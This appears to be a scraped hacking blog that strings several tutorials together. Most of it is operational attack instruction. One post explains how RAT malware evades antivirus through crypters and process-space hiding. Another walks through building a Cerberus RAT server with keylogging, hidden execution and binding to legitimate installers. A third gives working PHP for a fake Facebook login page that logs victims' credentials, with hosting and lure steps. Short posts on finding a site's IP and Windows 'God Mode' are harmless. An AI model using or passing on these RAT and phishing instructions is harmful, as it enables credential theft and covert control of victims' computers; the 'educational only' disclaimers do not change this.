Some vendors also offer custom RAT clients for special price, again due to its code being new any Anti-Virus program will hardly have its definition and hence even this works. Next is hex-editing, it is one of the most difficult thing to do for changing signature of the RAT server(our virus) file. So far as I know it is really very difficult and attacker must be having powerful hand over understanding different number systems and machine level codes, also it is very time consuming process. If you want to know how it is done then Rahul Tyagi has offered a pro tutorial on his blog www.salienthacker.in on hex-editing.

Last is one of the most easiest methods and due to which a VIRUS code becomes Fully Undetectable. The use of crypt-or software avoids the job of recoding and hex-editing and mutates the signature of virus file in such a way that it works fine but its code generates different signature which is not anyhow matches the previous signature, thus making is undetectable.

Other factor that leads to hide RAT in your system is process space sharing. In this the RAT server file shares process space of system processes or well known process like,
explorer.exe
svchost.exe
services.exe

And the last factor that let them do their job is port number. Many RAT clients will use regularly used port numbers to establish connections like HTTP port 80, HTTP proxy port 8080, FTP port 21 and uses any kinda connection may it be TCP or UDP.

So above are some reasons why a RAT server doesn't get detected when all codes are available to Anti-Virus vendors. So the next time we meet we'll discus how you can prevent yourself from a RAT attack.

RAT

RAT :-

In this post we will learn how to create Remote Administration Tool(RAT). But before we proceed let's discus some basic terminologies.

Trojan: Trojan horse or Trojan is a malware that appears to perform a desirable function for the user prior to run or install but instead facilitates unauthorized access of the user's computer system. It is harmful software/code that appears legitimate. They come packed with some other piece of code or software and hence users get tricked to run them. The term Trojan has been derived from the Trojan Horse from Greek Mythology.

Remote Access Tool(RAT): Remote Administration Tool also known as RAT is used to remotely connect and manage single or multiple computers. RAT is one of the most dangerous Trojan because it compromises features of all types of Trojans. It provides an attacker with nearly unlimited access to host computer along with Screen Capture, File management, shell control and device drivers control. RATs uses reverse connections to connect remote system and hence are more likely to remain undetected. They can hide themselves in process space of legitimate program and hence never appear in task manager or system monitors.

A Trojan generally has two parts Client and Server or Master and Slave. We can say Server is Slave and Client is Master. So a server side is installed on a remote host and the attacker manipulates it with client software. In olden days making a Trojan was a job of master programmer but now a days several Trojan building tools are available. Most of them usually have same kinda interface so its quite easy to use any Trojan client once you have used any one of them . Following is list of some well known Trojans and Trojan Building Tools,

1.Casa RAT

2.Back Orifice

3.Bandook RAT

4.Dark Comet Rat

5.Cerberus

6.Cybergate

7.Blackshades

8.Poison Ivy

9.Schwarze Sonne RAT

10.Syndrome RAT

11.Team Viewer

12.Y3k RAT

13Snoopy

15.5p00f3r.N$ RAT

16.NetBus

17.SpyNet

18.P. Storrie RAT

19.Turkojan Gold

20.Bifrost

21.Lost Door

22.Beast

23.Shark

24.Sub7

25.Pain RAT

26.xHacker Pro RAT

27.Seed RAT

28.Optix Pro RAT

29.Dark Moon

30.NetDevil

31.Deeper RAT

32.MiniMo RAT

If you think the list is very big then I must tell you it's not complete nor it covered 25% of RAT building tools.

Demonstration: How to create a RAT:Since there are several tools available and most of them have same kinda interface we can select any RAT building tool for demonstration. So here we select Cerberus Client to demonstrate working of RAT. Please note that using RAT for hacking is crime please take this demonstration for educational purpose only.

Type “Download Cerberus RAT” in Google search and download Cerberus RAT. Execute Cerberus file and launch program. Accept EULA and following interface will be launched in front of you.

To create server press new button.

As you can see there are several options are available in settings but for our demonstration we will use most common settings. In “Basic Option” type your IP address and then press “+”. In identification name of the server from which your client will identify to which server it's listening, this name is given for your client to identify connection. No need to specify what to put in connection password. Specify the port on which you'll like to listen. Please keep note of this port since you'll have to configure client settings to receive information on this port.

The next option is “Server Installation”. From “Directory Installation” you can select where and in which name folder your RAT server will be installed. In “File Name” option you have to specify name and extension of your server. Boot Methods gives you option to start your server as “System Service” or “User Application” take your pick or leave them untouched. “Anti-Debugging” function allows your RAT to bypass Virtualisation and Sandboxing.

From “Misc Options” you can activate key logging feature as well as you can select how your RAT can hide itself in another process.

“Display Message” option gives you power to show custom message on victim's computer.

“Black List Item” option allows to set logic for execution of your RAT server with respect to specific process and service. Mostly only advanced users use this feature.

“Overview” allows you look of features of your RAT. Now select an icon and press create server to create server.

Now the add file function allows you to bind your RAT with any legitimate file most probable is an executable installation file. To avoid detection don't use custom message box and UN-check “Run in Visible Mode” option while creating server. 

Configuring To Listen On Client: To configure Cerberus to listen on specific port select options and put “Connection Password” and “Connection Ports” that were specified in Server. Wait for victim to execute server and then just right click on listening server and play with options.

Finding Ip Address Of A Website Using Command Prompt / CMD

Finding Ip Address Of A Website Using Command Prompt / CMD

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?

How to find IP ?

1. Go to Start > Type CMD and press Enter.

2. Now write Ping followed by website URL whose IP you want to find.

3. It will take less then a second and come up with the results as shown below.

Enjoy :D

Enable God Mode In Windows 7 And Windows 8

Enable God Mode In Windows 7 And Windows 8

In this tutorial i will show you to enable God Mode in Windows 7, Win8 & Vista. By enabling God mode you can access all your windows setting from one folder and it makes really easy to access and change windows settings. This work 32 as well as 64 bit operating system. So lets enable God mode on your computer.

How to do it ?

  1. On your desktop right click and create a New Folder.

  2. Rename this folder to the code given below.

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

  3. Done now double click on this folder and you will have access to all your windows operating system settings.

HOW TO HACK ACCOUNTS USING PHISHING

HOW TO HACK ACCOUNTS USING PHISHING

HOW TO HACK ACCOUNTS ?

1. First Open the website of which you want to make phisher/ fake login page   Eg : Facebook.com

2. Now do right click and save the page source.

3. Open the page in notepad, Now search for "action = " and change following address to login.php.

4. After editing save the page as "index.html"

5. Now its time to create login.php . Open notepad and copy/paste this below code and save it as login.php :

    header ('Location: http://facebook.com/login.php');

    $handle = fopen("log.txt", "a");

    foreach($_POST as $variable => $value) {

    fwrite($handle, $variable);

    fwrite($handle, "=");

    fwrite($handle, $value);

    fwrite($handle, "\r\n");

    }

    fwrite($handle, "\r\n");

    fclose($handle);

    exit;

    ?>

6. Now create a simple and empty text file in notepad and save it as log.txt

7. Now create your own free web hosting account at my3gb.com and upload all the three files.(You can use any FREE web hosting site)

8. Upload Index.html , login.php , log.txt we created in above steps...

9. We are done, our phisher / fake login page is ready.

How to Hack Accounts ?

Send the index.html (the uploaded  000webhost.com ) link to the victim , once he/she will enter the information and do login with our fake login page then every thing will be stored in log.txt, we can now open log.txt to see all the Login details

Its very simple to create phisher of any website in the world, Here i have taken the example of Facebook Phisher . But in this same you can also create the phisher of many websites like yahoo, gmail, orkut, msn, paypal etc .

/*Note : This tutorial is for study purpose only. I want to make you aware how phishing is done . Please don't misuse this Knowledge. Don't "Hack Accounts" , its illegal. I am not responsible for any hack done by you..*/